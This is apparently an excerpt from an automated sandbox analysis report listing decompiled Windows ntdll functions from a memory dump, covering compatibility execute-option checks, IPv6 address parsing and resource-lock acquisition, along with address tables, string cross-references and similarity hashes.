					E00893F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
					_t71 = 0x214;
					_v544 = 0x214;
					E0084DFC0( &_v540, 0, 0x214);
					_t75 = _t74 + 0x20;
					_t46 =  *0x924218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
					__eflags = _t46;
					if(_t46 == 0) {
						goto L1;
					}
					_t47 = _v544;
					__eflags = _t47;
					if(_t47 == 0) {
						goto L1;
					}
					__eflags = _t47 - 0x214;
					if(_t47 >= 0x214) {
						goto L1;
					}
					_push(_t62);
					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
					E00893F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
					_t52 = E00850D27( &_v540, L"Execute=1");
					_t76 = _t75 + 0x1c;
					_push(_t62);
					__eflags = _t52;
					if(_t52 == 0) {
						E00893F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
						_t71 =  &_v540;
						_t56 = _t73 + _v544 - 0x218;
						_t77 = _t76 + 0x14;
						_v552 = _t56;
						__eflags = _t71 - _t56;
						if(_t71 >= _t56) {
							goto L1;
						} else {
							goto L10;
						}
						while(1) {
							L10:
							_t62 = E00858375(_t71, 0x20);
							_pop(_t69);
							__eflags = _t62;
							if(__eflags != 0) {
								__eflags = 0;
								 *_t62 = 0;
							}
							E00893F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
							_t77 = _t77 + 0x10;
							E008BE8DB(_t69, _t70, __eflags, _t72, _t71);
							__eflags = _t62;
							if(_t62 == 0) {
								goto L1;
							}
							_t31 = _t62 + 2; // 0x2
							_t71 = _t31;
							__eflags = _t71 - _v552;
							if(_t71 >= _v552) {
								goto L1;
							}
						}
					}
					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
					_push(3);
					_push(0x55);
					E00893F92();
					_t38 = 1;
					L2:
					return E0084E1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
				}
				L1:
				_t38 = 0;
				goto L2;
			}

0x00877f08
0x00877f0f
0x00877f12
0x00877f1b
0x00877f31
0x00893ead
0x00893eb4
0x00000000
0x00000000
0x00893eba
0x00893ecd
0x00893ed2
0x00893ee1
0x00893ee7
0x00893eec
0x00893f12
0x00893f18
0x00893f1a
0x00000000
0x00000000
0x00893f20
0x00893f26
0x00893f28
0x00000000
0x00000000
0x00893f2e
0x00893f30
0x00000000
0x00000000
0x00893f3a
0x00893f3b
0x00893f53
0x00893f64
0x00893f69
0x00893f6c
0x00893f6d
0x00893f6f
0x0089e304
0x0089e30f
0x0089e315
0x0089e31e
0x0089e321
0x0089e327
0x0089e329
0x00000000
0x00000000
0x00000000
0x00000000
0x0089e32f
0x0089e32f
0x0089e337
0x0089e33a
0x0089e33b
0x0089e33d
0x0089e33f
0x0089e341
0x0089e341
0x0089e34e
0x0089e353
0x0089e358
0x0089e35d
0x0089e35f
0x00000000
0x00000000
0x0089e365
0x0089e365
0x0089e368
0x0089e36e
0x00000000
0x00000000
0x0089e374
0x0089e32f
0x00893f75
0x00893f7a
0x00893f7c
0x00893f7e
0x00893f86
0x00877f39
0x00877f47
0x00877f47
0x00877f37
0x00877f37
0x00000000

APIs

BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 00893F12

Strings

ExecuteOptions, xrefs: 00893F04
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 00893EC4
CLIENT(ntdll): Processing section info %ws..., xrefs: 0089E345
Execute=1, xrefs: 00893F5E
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 00893F4A
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 00893F75
'D, xrefs: 00877F1E
CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 0089E2FB

Memory Dump Source

Source File: 00000005.00000002.2158540931.0000000000830000.00000040.00000001.sdmp, Offset: 00820000, based on PE: true

Associated: 00000005.00000002.2158531301.0000000000820000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159475098.0000000000910000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159481998.0000000000920000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159487236.0000000000924000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159492239.0000000000927000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159496990.0000000000930000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159536082.0000000000990000.00000040.00000001.sdmp Download File

Similarity

API ID: BaseDataModuleQuery
String ID: 'D$CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 3901378454-4119818742
Opcode ID: 542439d9e149c1e3b9d5cb01d502be00908f349b337a0a149e2cd94b3a86c7de
Instruction ID: e582489087936b2a4566a614cd051dbfb65c1ac27f63b148dac223fcba995ee8
Opcode Fuzzy Hash: 542439d9e149c1e3b9d5cb01d502be00908f349b337a0a149e2cd94b3a86c7de
Instruction Fuzzy Hash: 4841B771A8421C7ADF20EA94DCC6FEA73BCFB15700F0445A9F509E6181EA70DB45CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00880B15, Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 272
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00880B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void* _t108;
				void* _t116;
				char _t120;
				short _t121;
				void* _t128;
				intOrPtr* _t130;
				char _t132;
				short _t133;
				intOrPtr _t141;
				signed int _t156;
				signed int _t174;
				intOrPtr _t177;
				intOrPtr* _t179;
				intOrPtr _t180;
				void* _t183;

				_t179 = _a4;
				_t141 =  *_t179;
				_v16 = 0;
				_v28 = 0;
				_v8 = 0;
				_v24 = 0;
				_v12 = 0;
				_v32 = 0;
				_v20 = 0;
				if(_t141 == 0) {
					L41:
					 *_a8 = _t179;
					_t180 = _v24;
					if(_t180 != 0) {
						if(_t180 != 3) {
							goto L6;
						}
						_v8 = _v8 + 1;
					}
					_t174 = _v32;
					if(_t174 == 0) {
						if(_v8 == 7) {
							goto L43;
						}
						goto L6;
					}
					L43:
					if(_v16 != 1) {
						if(_v16 != 2) {
							goto L6;
						}
						 *((short*)(_a12 + _v20 * 2)) = 0;
						L47:
						if(_t174 != 0) {
							E00858980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
							_t116 = 8;
							E0084DFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
						}
						return 0;
					}
					if(_t180 != 0) {
						if(_v12 > 3) {
							goto L6;
						}
						_t120 = E00880CFA(_v28, 0, 0xa);
						_t183 = _t183 + 0xc;
						if(_t120 > 0xff) {
							goto L6;
						}
						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
						goto L47;
					}
					if(_v12 > 4) {
						goto L6;
					}
					_t121 = E00880CFA(_v28, _t180, 0x10);
					_t183 = _t183 + 0xc;
					 *((short*)(_a12 + _v20 * 2)) = _t121;
					goto L47;
				} else {
					while(1) {
						_t123 = _v16;
						if(_t123 == 0) {
							goto L7;
						}
						_t108 = _t123 - 1;
						if(_t108 != 0) {
							goto L1;
						}
						_t178 = _t141;
						if(E008806BA(_t108, _t141) == 0 || _t135 == 0) {
							if(E008806BA(_t135, _t178) == 0 || E00880A5B(_t136, _t178) == 0) {
								if(_t141 != 0x3a) {
									if(_t141 == 0x2e) {
										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
											goto L41;
										} else {
											_v24 = _v24 + 1;
											L27:
											_v16 = _v16 & 0x00000000;
											L28:
											if(_v28 == 0) {
												goto L20;
											}
											_t177 = _v24;
											if(_t177 != 0) {
												if(_v12 > 3) {
													L6:
													return 0xc000000d;
												}
												_t132 = E00880CFA(_v28, 0, 0xa);
												_t183 = _t183 + 0xc;
												if(_t132 > 0xff) {
													goto L6;
												}
												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
												goto L20;
											}
											if(_v12 > 4) {
												goto L6;
											}
											_t133 = E00880CFA(_v28, 0, 0x10);
											_t183 = _t183 + 0xc;
											_v20 = _v20 + 1;
											 *((short*)(_a12 + _v20 * 2)) = _t133;
											goto L20;
										}
									}
									goto L41;
								}
								if(_v24 > 0 || _v8 > 6) {
									goto L41;
								} else {
									_t130 = _t179 + 1;
									if( *_t130 == _t141) {
										if(_v32 != 0) {
											goto L41;
										}
										_v32 = _v8 + 1;
										_t156 = 2;
										_v8 = _v8 + _t156;
										L34:
										_t179 = _t130;
										_v16 = _t156;
										goto L28;
									}
									_v8 = _v8 + 1;
									goto L27;
								}
							} else {
								_v12 = _v12 + 1;
								if(_v24 > 0) {
									goto L41;
								}
								_a7 = 1;
								goto L20;
							}
						} else {
							_v12 = _v12 + 1;
							L20:
							_t179 = _t179 + 1;
							_t141 =  *_t179;
							if(_t141 == 0) {
								goto L41;
							}
							continue;
						}
						L7:
						if(_t141 == 0x3a) {
							if(_v24 > 0 || _v8 > 0) {
								goto L41;
							} else {
								_t130 = _t179 + 1;
								if( *_t130 != _t141) {
									goto L41;
								}
								_v20 = _v20 + 1;
								_t156 = 2;
								_v32 = 1;
								_v8 = _t156;
								 *((short*)(_a12 + _v20 * 2)) = 0;
								goto L34;
							}
						}
						L8:
						if(_v8 > 7) {
							goto L41;
						}
						_t142 = _t141;
						if(E008806BA(_t123, _t141) == 0 || _t124 == 0) {
							if(E008806BA(_t124, _t142) == 0 || E00880A5B(_t125, _t142) == 0 || _v24 > 0) {
								goto L41;
							} else {
								_t128 = 1;
								_a7 = 1;
								_v28 = _t179;
								_v16 = 1;
								_v12 = 1;
								L39:
								if(_v16 == _t128) {
									goto L20;
								}
								goto L28;
							}
						} else {
							_a7 = 0;
							_v28 = _t179;
							_v16 = 1;
							_v12 = 1;
							goto L20;
						}
					}
				}
				L1:
				_t123 = _t108 == 1;
				if(_t108 == 1) {
					goto L8;
				}
				_t128 = 1;
				goto L39;
			}

0x00880b21
0x00880b24
0x00880b27
0x00880b2a
0x00880b2d
0x00880b30
0x00880b33
0x00880b36
0x00880b39
0x00880b3e
0x00880c65
0x00880c68
0x00880c6a
0x00880c6f
0x008aeb42
0x00000000
0x00000000
0x008aeb48
0x008aeb48
0x00880c75
0x00880c7a
0x008aeb54
0x00000000
0x00000000
0x00000000
0x008aeb5a
0x00880c80
0x00880c84
0x008aeb98
0x00000000
0x00000000
0x008aeba6
0x00880cb8
0x00880cba
0x00880cd3
0x00880cda
0x00880ce4
0x00880ce9
0x00000000
0x00880cec
0x00880c8c
0x008aeb63
0x00000000
0x00000000
0x008aeb70
0x008aeb75
0x008aeb7d
0x00000000
0x00000000
0x008aeb8c
0x00000000
0x008aeb8c
0x00880c96
0x00000000
0x00000000
0x00880ca2
0x00880cac
0x00880cb4
0x00000000
0x00000000
0x00880b44
0x00880b47
0x00880b49
0x00000000
0x00000000
0x00880b4f
0x00880b50
0x00000000
0x00000000
0x00880b56
0x00880b62
0x00880b7c
0x00880bac
0x00880a0f
0x008aeaaa
0x00000000
0x008aeac4
0x008aeac4
0x00880bd0
0x00880bd0
0x00880bd4
0x00880bd9
0x00000000
0x00000000
0x00880bdb
0x00880be0
0x008aeb0e
0x00880a1a
0x00000000
0x00880a1a
0x008aeb1a
0x008aeb1f
0x008aeb27
0x00000000
0x00000000
0x008aeb36
0x00000000
0x008aeb36
0x00880bea
0x00000000
0x00000000
0x00880bf6
0x00880c00
0x00880c03
0x00880c0b
0x00000000
0x00880c0b
0x008aeaaa
0x00000000
0x00880a15
0x00880bb6
0x00000000
0x00880bc6
0x00880bc6
0x00880bcb
0x00880c15
0x00000000
0x00000000
0x00880c1d
0x00880c20
0x00880c21
0x00880c24
0x00880c24
0x00880c26
0x00000000
0x00880c26
0x00880bcd
0x00000000
0x00880bcd
0x00880b89
0x00880b89
0x00880b90
0x00000000
0x00000000
0x00880b96
0x00000000
0x00880b96
0x00880a04
0x00880a04
0x00880b9a
0x00880b9a
0x00880b9b
0x00880b9f
0x00000000
0x00000000
0x00000000
0x00880ba5
0x00880ac7
0x00880aca
0x008aeacf
0x00000000
0x008aeade
0x008aeade
0x008aeae3
0x00000000
0x00000000
0x008aeaf3
0x008aeaf6
0x008aeaf7
0x008aeafe
0x008aeb01
0x00000000
0x008aeb01
0x008aeacf
0x00880ad0
0x00880ad4
0x00000000
0x00000000
0x00880ada
0x00880ae6
0x00880c34
0x00000000
0x00880c47
0x00880c49
0x00880c4a
0x00880c4e
0x00880c51
0x00880c54
0x00880c57
0x00880c5a
0x00000000
0x00000000
0x00000000
0x00880c60
0x00880afb
0x00880afe
0x00880b02
0x00880b05
0x00880b08
0x00000000
0x00880b08
0x00880ae6
0x00880b44
0x008809f8
0x008809f8
0x008809f9
0x00000000
0x00000000
0x008aeaa0
0x00000000

APIs

__fassign.LIBCMT ref: 00880BF6
__fassign.LIBCMT ref: 00880CA2

Strings

:, xrefs: 00880BA9
., xrefs: 00880A0C
:, xrefs: 00880AC7

Memory Dump Source

Source File: 00000005.00000002.2158540931.0000000000830000.00000040.00000001.sdmp, Offset: 00820000, based on PE: true

Associated: 00000005.00000002.2158531301.0000000000820000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159475098.0000000000910000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159481998.0000000000920000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159487236.0000000000924000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159492239.0000000000927000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159496990.0000000000930000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159536082.0000000000990000.00000040.00000001.sdmp Download File

Similarity

API ID: __fassign
String ID: .$:$:
API String ID: 3965848254-2308638275
Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
Instruction ID: cfcbb6ca97f2228bade5fefad9ffaad215e8d966836af962544c970eb6306040
Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
Instruction Fuzzy Hash: 49A1BD31D0030ADFDBA4EFA8C8446AEB7B6FF05315F24846ED812E7242D6309A49CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00880554, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 202
COMMON

Download Yara Rule

C-Code - Quality: 49%

			E00880554(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int* _t49;
				signed int _t51;
				signed int _t56;
				signed int _t58;
				signed int _t61;
				signed int _t63;
				void* _t66;
				intOrPtr _t67;
				signed int _t70;
				void* _t75;
				signed int _t81;
				signed int _t84;
				void* _t86;
				signed int _t93;
				signed int _t96;
				intOrPtr _t105;
				signed int _t107;
				void* _t110;
				signed int _t115;
				signed int* _t119;
				void* _t125;
				void* _t126;
				signed int _t128;
				signed int _t130;
				signed int _t138;
				signed int _t144;
				void* _t158;
				void* _t159;
				void* _t160;

				_t96 = _a4;
				_t115 =  *(_t96 + 0x28);
				_push(_t138);
				if(_t115 < 0) {
					_t105 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
						goto L6;
					} else {
						__eflags = _t115 | 0xffffffff;
						asm("lock xadd [eax], edx");
						return 1;
					}
				} else {
					L6:
					_push(_t128);
					while(1) {
						L7:
						__eflags = _t115;
						if(_t115 >= 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
							_t49 = _t96 + 0x1c;
							_t106 = 1;
							asm("lock xadd [edx], ecx");
							_t115 =  *(_t96 + 0x28);
							__eflags = _t115;
							if(_t115 < 0) {
								L23:
								_t130 = 0;
								__eflags = 0;
								while(1) {
									_t118 =  *(_t96 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x009201c0;
									_push(_t144);
									_push(0);
									_t51 = E0083F8CC( *((intOrPtr*)(_t96 + 0x18)));
									__eflags = _t51 - 0x102;
									if(_t51 != 0x102) {
										break;
									}
									_t106 =  *(_t144 + 4);
									_t126 =  *_t144;
									_t86 = E00884FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
									_push(_t126);
									_push(_t86);
									E00893F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
									E00893F92(0x65, 0, "RTL: Resource at %p\n", _t96);
									_t130 = _t130 + 1;
									_t160 = _t158 + 0x28;
									__eflags = _t130 - 2;
									if(__eflags > 0) {
										E008C217A(_t106, __eflags, _t96);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E00893F92();
									_t158 = _t160 + 0xc;
								}
								__eflags = _t51;
								if(__eflags < 0) {
									_push(_t51);
									E00883915(_t96, _t106, _t118, _t130, _t144, __eflags);
									asm("int3");
									while(1) {
										L32:
										__eflags = _a8;
										if(_a8 == 0) {
											break;
										}
										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
										_t119 = _t96 + 0x24;
										_t107 = 1;
										asm("lock xadd [eax], ecx");
										_t56 =  *(_t96 + 0x28);
										_a4 = _t56;
										__eflags = _t56;
										if(_t56 != 0) {
											L40:
											_t128 = 0;
											__eflags = 0;
											while(1) {
												_t121 =  *(_t96 + 0x30) & 0x00000001;
												asm("sbb esi, esi");
												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x009201c0;
												_push(_t138);
												_push(0);
												_t58 = E0083F8CC( *((intOrPtr*)(_t96 + 0x20)));
												__eflags = _t58 - 0x102;
												if(_t58 != 0x102) {
													break;
												}
												_t107 =  *(_t138 + 4);
												_t125 =  *_t138;
												_t75 = E00884FC0(_t125, _t107, 0xff676980, 0xffffffff);
												_push(_t125);
												_push(_t75);
												E00893F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
												E00893F92(0x65, 0, "RTL: Resource at %p\n", _t96);
												_t128 = _t128 + 1;
												_t159 = _t158 + 0x28;
												__eflags = _t128 - 2;
												if(__eflags > 0) {
													E008C217A(_t107, __eflags, _t96);
												}
												_push("RTL: Re-Waiting\n");
												_push(0);
												_push(0x65);
												E00893F92();
												_t158 = _t159 + 0xc;
											}
											__eflags = _t58;
											if(__eflags < 0) {
												_push(_t58);
												E00883915(_t96, _t107, _t121, _t128, _t138, __eflags);
												asm("int3");
												_t61 =  *_t107;
												 *_t107 = 0;
												__eflags = _t61;
												if(_t61 == 0) {
													L1:
													_t63 = E00865384(_t138 + 0x24);
													if(_t63 != 0) {
														goto L52;
													} else {
														goto L2;
													}
												} else {
													_t123 =  *((intOrPtr*)(_t138 + 0x18));
													_push( &_a4);
													_push(_t61);
													_t70 = E0083F970( *((intOrPtr*)(_t138 + 0x18)));
													__eflags = _t70;
													if(__eflags >= 0) {
														goto L1;
													} else {
														_push(_t70);
														E00883915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
														L52:
														_t122 =  *((intOrPtr*)(_t138 + 0x20));
														_push( &_a4);
														_push(1);
														_t63 = E0083F970( *((intOrPtr*)(_t138 + 0x20)));
														__eflags = _t63;
														if(__eflags >= 0) {
															L2:
															return _t63;
														} else {
															_push(_t63);
															E00883915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
															_t109 =  *((intOrPtr*)(_t138 + 0x20));
															_push( &_a4);
															_push(1);
															_t63 = E0083F970( *((intOrPtr*)(_t138 + 0x20)));
															__eflags = _t63;
															if(__eflags >= 0) {
																goto L2;
															} else {
																_push(_t63);
																_t66 = E00883915(_t96, _t109, _t122, _t128, _t138, __eflags);
																asm("int3");
																while(1) {
																	_t110 = _t66;
																	__eflags = _t66 - 1;
																	if(_t66 != 1) {
																		break;
																	}
																	_t128 = _t128 | 0xffffffff;
																	_t66 = _t110;
																	asm("lock cmpxchg [ebx], edi");
																	__eflags = _t66 - _t110;
																	if(_t66 != _t110) {
																		continue;
																	} else {
																		_t67 =  *[fs:0x18];
																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
																		return _t67;
																	}
																	goto L58;
																}
																E00865329(_t110, _t138);
																return E008653A5(_t138, 1);
															}
														}
													}
												}
											} else {
												_t56 =  *(_t96 + 0x28);
												goto L3;
											}
										} else {
											_t107 =  *_t119;
											__eflags = _t107;
											if(__eflags > 0) {
												while(1) {
													_t81 = _t107;
													asm("lock cmpxchg [edi], esi");
													__eflags = _t81 - _t107;
													if(_t81 == _t107) {
														break;
													}
													_t107 = _t81;
													__eflags = _t81;
													if(_t81 > 0) {
														continue;
													}
													break;
												}
												_t56 = _a4;
												__eflags = _t107;
											}
											if(__eflags != 0) {
												while(1) {
													L3:
													__eflags = _t56;
													if(_t56 != 0) {
														goto L32;
													}
													_t107 = _t107 | 0xffffffff;
													_t56 = 0;
													asm("lock cmpxchg [edx], ecx");
													__eflags = 0;
													if(0 != 0) {
														continue;
													} else {
														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
														return 1;
													}
													goto L58;
												}
												continue;
											} else {
												goto L40;
											}
										}
										goto L58;
									}
									__eflags = 0;
									return 0;
								} else {
									_t115 =  *(_t96 + 0x28);
									continue;
								}
							} else {
								_t106 =  *_t49;
								__eflags = _t106;
								if(__eflags > 0) {
									while(1) {
										_t93 = _t106;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t93 - _t106;
										if(_t93 == _t106) {
											break;
										}
										_t106 = _t93;
										__eflags = _t93;
										if(_t93 > 0) {
											continue;
										}
										break;
									}
									__eflags = _t106;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L23;
								}
							}
						}
						goto L58;
					}
					_t84 = _t115;
					asm("lock cmpxchg [esi], ecx");
					__eflags = _t84 - _t115;
					if(_t84 != _t115) {
						_t115 = _t84;
						goto L7;
					} else {
						return 1;
					}
				}
				L58:
			}

0x0088055a
0x0088055d
0x00880563
0x00880566
0x008805d8
0x008805e2
0x008805e5
0x00000000
0x008805e7
0x008805e7
0x008805ea
0x008805f3
0x008805f3
0x00880568
0x00880568
0x00880568
0x00880569
0x00880569
0x00880569
0x0088056b
0x00000000
0x00000000
0x008a217f
0x008a2183
0x008a225b
0x008a225f
0x008a2189
0x008a218c
0x008a218f
0x008a2194
0x008a2199
0x008a219d
0x008a21a0
0x008a21a2
0x008a21ce
0x008a21ce
0x008a21ce
0x008a21d0
0x008a21d6
0x008a21de
0x008a21e2
0x008a21e8
0x008a21e9
0x008a21ec
0x008a21f1
0x008a21f6
0x00000000
0x00000000
0x008a21f8
0x008a21fb
0x008a2206
0x008a220b
0x008a220c
0x008a2217
0x008a2226
0x008a222b
0x008a222c
0x008a222f
0x008a2232
0x008a2235
0x008a2235
0x008a223a
0x008a223f
0x008a2241
0x008a2243
0x008a2248
0x008a2248
0x008a224d
0x008a224f
0x008a2262
0x008a2263
0x008a2268
0x008a2269
0x008a2269
0x008a2269
0x008a226d
0x00000000
0x00000000
0x008a2276
0x008a2279
0x008a227e
0x008a2283
0x008a2287
0x008a228a
0x008a228d
0x008a228f
0x008a22bc
0x008a22bc
0x008a22bc
0x008a22be
0x008a22c4
0x008a22cc
0x008a22d0
0x008a22d6
0x008a22d7
0x008a22da
0x008a22df
0x008a22e4
0x00000000
0x00000000
0x008a22e6
0x008a22e9
0x008a22f4
0x008a22f9
0x008a22fa
0x008a2305
0x008a2314
0x008a2319
0x008a231a
0x008a231d
0x008a2320
0x008a2323
0x008a2323
0x008a2328
0x008a232d
0x008a232f
0x008a2331
0x008a2336
0x008a2336
0x008a233b
0x008a233d
0x008a2350
0x008a2351
0x008a2356
0x008a2359
0x008a2359
0x008a235b
0x008a235d
0x00865367
0x0086536b
0x00865372
0x00000000
0x00000000
0x00000000
0x00000000
0x008a2363
0x008a2363
0x008a2369
0x008a236a
0x008a236c
0x008a2371
0x008a2373
0x00000000
0x008a2379
0x008a2379
0x008a237a
0x008a237f
0x008a237f
0x008a2385
0x008a2386
0x008a2389
0x008a238e
0x008a2390
0x00865378
0x0086537c
0x008a2396
0x008a2396
0x008a2397
0x008a239c
0x008a23a2
0x008a23a3
0x008a23a6
0x008a23ab
0x008a23ad
0x00000000
0x008a23b3
0x008a23b3
0x008a23b4
0x008a23b9
0x008a23ba
0x008a23ba
0x008a23bc
0x008a23bf
0x00000000
0x00000000
0x00899153
0x00899158
0x0089915a
0x0089915e
0x00899160
0x00000000
0x00899166
0x00899166
0x00899171
0x00899176
0x00899176
0x00000000
0x00899160
0x008a23c6
0x008a23d7
0x008a23d7
0x008a23ad
0x008a2390
0x008a2373
0x008a233f
0x008a233f
0x00000000
0x008a233f
0x008a2291
0x008a2291
0x008a2293
0x008a2295
0x008a229a
0x008a22a1
0x008a22a3
0x008a22a7
0x008a22a9
0x00000000
0x00000000
0x008a22ab
0x008a22ad
0x008a22af
0x00000000
0x00000000
0x00000000
0x008a22af
0x008a22b1
0x008a22b4
0x008a22b4
0x008a22b6
0x008653be
0x008653be
0x008653be
0x008653c0
0x00000000
0x00000000
0x008653cb
0x008653ce
0x008653d0
0x008653d4
0x008653d6
0x00000000
0x008653d8
0x008653e3
0x008653ea
0x008653ea
0x00000000
0x008653d6
0x00000000
0x00000000
0x00000000
0x00000000
0x008a22b6
0x00000000
0x008a228f
0x008a2349
0x008a234d
0x008a2251
0x008a2251
0x00000000
0x008a2251
0x008a21a4
0x008a21a4
0x008a21a6
0x008a21a8
0x008a21ac
0x008a21b6
0x008a21b8
0x008a21bc
0x008a21be
0x00000000
0x00000000
0x008a21c0
0x008a21c2
0x008a21c4
0x00000000
0x00000000
0x00000000
0x008a21c4
0x008a21c6
0x008a21c6
0x008a21c8
0x00000000
0x00000000
0x00000000
0x00000000
0x008a21c8
0x008a21a2
0x00000000
0x008a2183
0x0088057b
0x0088057d
0x00880581
0x00880583
0x008a2178
0x00000000
0x00880589
0x0088058f
0x0088058f
0x00880583
0x00000000

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008A2206

Strings

RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 008A220E
RTL: Re-Waiting, xrefs: 008A223A, 008A2328
RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 008A22FC
RTL: Resource at %p, xrefs: 008A221D, 008A230B

Memory Dump Source

Source File: 00000005.00000002.2158540931.0000000000830000.00000040.00000001.sdmp, Offset: 00820000, based on PE: true

Associated: 00000005.00000002.2158531301.0000000000820000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159475098.0000000000910000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159481998.0000000000920000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159487236.0000000000924000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159492239.0000000000927000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159496990.0000000000930000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159536082.0000000000990000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-4236105082
Opcode ID: 586c2f2921126b620c2fd8cb6334257d80b467eeb682ff26279f5be2da092dbe
Instruction ID: a8fd4c7e0d2ce9fb10b93c1dbdf6b3c463db8367e5eba5cb48dfccc797c8bab1
Opcode Fuzzy Hash: 586c2f2921126b620c2fd8cb6334257d80b467eeb682ff26279f5be2da092dbe
Instruction Fuzzy Hash: CB513831B002156BEF24DA1CCC81F6673A9FF95720F258229FD54DB386EA35EC418BA1

Uniqueness

Uniqueness Score: -1.00%

Function 008814C0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 008AEA22

Part of subcall function 008813CB: ___swprintf_l.LIBCMT ref: 0088146B
Part of subcall function 008813CB: ___swprintf_l.LIBCMT ref: 00881490

___swprintf_l.LIBCMT ref: 0088156D

Strings

%%%u, xrefs: 00881564
]:%u, xrefs: 008AEA47

Memory Dump Source

Source File: 00000005.00000002.2158540931.0000000000830000.00000040.00000001.sdmp, Offset: 00820000, based on PE: true

Associated: 00000005.00000002.2158531301.0000000000820000.00000040.00000001.sdmp Download File
